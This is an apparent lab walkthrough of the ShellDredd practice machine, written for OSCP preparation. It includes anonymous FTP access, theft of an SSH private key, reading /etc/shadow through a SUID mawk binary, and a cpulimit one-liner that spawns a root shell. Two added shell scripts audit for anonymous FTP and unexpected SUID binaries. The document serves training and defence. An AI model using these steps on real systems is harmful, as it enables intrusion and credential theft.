Introduction
The article details a penetration testing walkthrough for the Offensive Security Proving Grounds machine named ShellDredd, useful for OSCP (Offensive Security Certified Professional) preparation. It covers key stages: information gathering with Nmap, gaining initial access via FTP anonymous login, using an SSH private key for further access, and performing Linux privilege escalation. The guide highlights tools like GTFOBins for exploiting binaries like Mawk and Cpulimit to achieve root access.
Information Gathering & Enumeration
Nmap Scanning and the open ports
nmap -p- --open -sV -sT -sC 192.168.191.130 -v -oN nmap
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.45.250
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
61000/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
FTP Anonymous Login
FTP Anonymous login can be discovered by trying “anonymous” as the username and password.
ftp 192.168.191.130 21
Connected to 192.168.191.130.
220 (vsFTPd 3.0.3)
Name (192.168.191.130:naveenj): anonymous
331 Please specify the password.
Password:
230 Login successful.
An SSH private key can be found after enumerating the directory contents (note the hidden .hannah directory, which a plain ls would not show):
ftp> ls -lsa
ftp> cd .hannah
-rwxr-xr-x 1 0 0 1823 Oct 12 2024 id_rsa
226 Directory send OK.
ftp> get id_rsa
226 Transfer complete.
1823 bytes received in 00:00 (8.97 KiB/s)
ftp>
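The exposure above has two parts: anonymous FTP is enabled, and a private key sits under the anonymous root. The following script is an added example, not part of the original walkthrough, that checks both from the defender's side. It assumes vsftpd reads /etc/vsftpd.conf and serves anonymous users from /srv/ftp (the Debian defaults); both paths can be overridden through the environment.

```shell
#!/bin/sh
# Added example (not from the original walkthrough): two defender-side checks
# for the FTP exposure shown above. Assumptions: vsftpd reads /etc/vsftpd.conf
# and serves anonymous users from /srv/ftp (the Debian defaults); override via
# the environment if your host differs.

VSFTPD_CONF="${VSFTPD_CONF:-/etc/vsftpd.conf}"
ANON_ROOT="${ANON_ROOT:-/srv/ftp}"

# anon_login_enabled CONF -> exit status 0 if CONF allows anonymous logins.
# vsftpd's compiled-in default for anonymous_enable is YES, so a config that
# never sets the directive counts as enabled; commented-out lines are ignored
# and the last active setting wins.
anon_login_enabled() {
    val=$(sed -n 's/^[[:space:]]*anonymous_enable[[:space:]]*=[[:space:]]*//p' "$1" | tail -n 1)
    val=$(printf '%s' "$val" | tr 'a-z' 'A-Z' | tr -d '[:space:]')
    case "${val:-YES}" in
        YES|TRUE|1) return 0 ;;
        *)          return 1 ;;
    esac
}

# find_exposed_keys DIR -> print every regular file under DIR (hidden
# directories such as .hannah included) that carries a PEM private-key header.
find_exposed_keys() {
    find "$1" -type f 2>/dev/null | while IFS= read -r f; do
        if grep -qs -- '-----BEGIN .*PRIVATE KEY-----' "$f"; then
            printf '%s\n' "$f"
        fi
    done
}

# Stand-alone run against the assumed live paths; each check is skipped when
# the path does not exist on this host.
if [ -f "$VSFTPD_CONF" ]; then
    if anon_login_enabled "$VSFTPD_CONF"; then
        echo "anonymous FTP login is ENABLED by $VSFTPD_CONF"
    else
        echo "anonymous FTP login is disabled by $VSFTPD_CONF"
    fi
fi
if [ -d "$ANON_ROOT" ]; then
    find_exposed_keys "$ANON_ROOT"
fi
```

The missing-directive case matters: a config that only sets listen=YES still allows anonymous logins, which is why the check treats an absent anonymous_enable as YES rather than as disabled. Any file the second check prints should be removed from the FTP tree and the corresponding key rotated, since anyone who could log in anonymously may already hold a copy.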
First Foothold Using SSH
ssh -i files/id_rsa hannah@192.168.191.130 -p 61000
hannah@ShellDredd:~$
Linux Privilege Escalation
Binary Exploitation
We can check files and binaries for their permissions, and especially for the SUID bit, which makes a binary run with the privileges of its owner (root, for the files below) rather than those of the user who starts it.
hannah@ShellDredd:~$ find / -perm -u=s -type f 2>/dev/null
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/umount
/usr/bin/mawk #--strange binary
Mawk from the above output stands out.
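The reason mawk stands out is that it is not part of the SUID set a stock Debian install ships with. The script below is an added example, not part of the original walkthrough, that turns that judgement into a repeatable audit: it compares a SUID listing against a baseline allowlist and prints whatever is unexpected. The allowlist is an assumption for a minimal Debian 10 install with merged /usr and should be extended from a known-good host; run on the listing above it reports /usr/bin/mawk, and the cpulimit binary used later on this page would be reported the same way.

```shell
#!/bin/sh
# Added example (not from the original walkthrough): audit the SUID binaries on
# a host against a baseline allowlist and print the ones that are not expected.
# The allowlist is an assumption for a minimal Debian 10 install with merged
# /usr; extend it from a known-good host before relying on it.

SUID_BASELINE="
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/su
/usr/bin/sudo
/usr/bin/umount
"

# is_baseline PATH -> exit status 0 if PATH is in the allowlist (exact match).
is_baseline() {
    printf '%s\n' "$SUID_BASELINE" | grep -qxF -- "$1"
}

# audit_suid: read one path per line on stdin, print those not in the baseline.
audit_suid() {
    while IFS= read -r path; do
        [ -n "$path" ] || continue
        if ! is_baseline "$path"; then
            printf '%s\n' "$path"
        fi
    done
}

# audit_host: enumerate the real SUID files with the same find used above.
audit_host() {
    find / -perm -u=s -type f 2>/dev/null | audit_suid
}

# sample_audit: constructed input, the listing from the walkthrough plus
# /usr/bin/cpulimit, so the script demonstrates itself without root.
sample_audit() {
    printf '%s\n' \
        /usr/lib/openssh/ssh-keysign \
        /usr/bin/gpasswd \
        /usr/bin/umount \
        /usr/bin/mawk \
        /usr/bin/cpulimit | audit_suid
}

if [ "${1:-}" = "--host" ]; then
    audit_host
else
    sample_audit
fi
```

Run with --host to audit the current machine. Anything it prints deserves a decision: either the bit is needed and the path goes into the baseline, or it is removed with chmod u-s on that file. Neither mawk nor cpulimit needs SUID for its normal job, so on this box both would be stripped.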
What is Mawk in Linux
In Linux, mawk is an implementation of the AWK programming language, optimized for efficiency and performance. It is used for text processing, particularly for extracting, manipulating, and reporting on data.
mawk processes lines of text based on user-defined patterns and actions, making it useful for tasks like searching text, performing calculations, and automating repetitive text-based tasks. It is typically faster and smaller than other AWK versions, such as the original AWK or gawk.
Exploiting Mawk Using GTFOBins
From GTFOBins:
If the binary has the SUID bit set, it does not drop the elevated privileges and may be abused to access the file system, escalate or maintain privileged access as a SUID backdoor. If it is used to run sh -p, omit the -p argument on systems like Debian (<= Stretch) that allow the default sh shell to run with SUID privileges. This example creates a local SUID copy of the binary and runs it to maintain elevated privileges. To interact with an existing SUID binary skip the first command and run the program using its original path.
We can apply the above practically: because mawk runs as root, it can read /etc/shadow, which gives us the password hashes for the users root and hannah.
hannah@ShellDredd:~$ mawk '//' "/etc/shadow" | grep -iE 'root|hannah'
Then we can copy the shadow and passwd files to the attacking machine and combine them with unshadow:
unshadow passwd shadow > hashes
But this leads to a dead end if you try to crack the hashes with John the Ripper or hashcat, so it is mentioned here for informational purposes only.
Exploiting Cpulimit using GTFOBins
What is Cpulimit?
cpulimit is a command-line utility in Linux that allows users to limit the CPU usage of a specific process. It is useful when you want to restrict a process from using too much CPU, ensuring that it does not consume all available resources, which could impact system performance or other processes. Unlike the nice or renice commands, which prioritize CPU access for processes, cpulimit actively throttles the CPU usage of a given process.
Here's a basic example of how you might use cpulimit:
sudo cpulimit -p 12345 -l 30
In this example:
- -p 12345 specifies the PID of the process to limit.
- -l 30 limits the process to 30% of the CPU.
Options:
- -e <executable>: Limits CPU usage based on the executable name.
- -p <pid>: Limits CPU usage of a process by its PID.
- -l <percentage>: Sets the CPU usage limit as a percentage.
- -b: Run in the background.
- -z: If the process is not running, wait for it to start before limiting CPU usage.
Example:
To limit a process called myprocess to 20% CPU usage, you can run:
sudo cpulimit -e myprocess -l 20
Limitations:
- cpulimit may not work as effectively on processes that frequently fork or run for a very short duration.
- It doesn't work system-wide and only affects the specified process.
From GTFOBins:
If the binary has the SUID bit set, it does not drop the elevated privileges and may be abused to access the file system, escalate or maintain privileged access as a SUID backdoor. If it is used to run sh -p, omit the -p argument on systems like Debian (<= Stretch) that allow the default sh shell to run with SUID privileges. This example creates a local SUID copy of the binary and runs it to maintain elevated privileges. To interact with an existing SUID binary skip the first command and run the program using its original path.
Applying this practically:
./cpulimit -l 100 -f -- /bin/sh -p
# whoami
root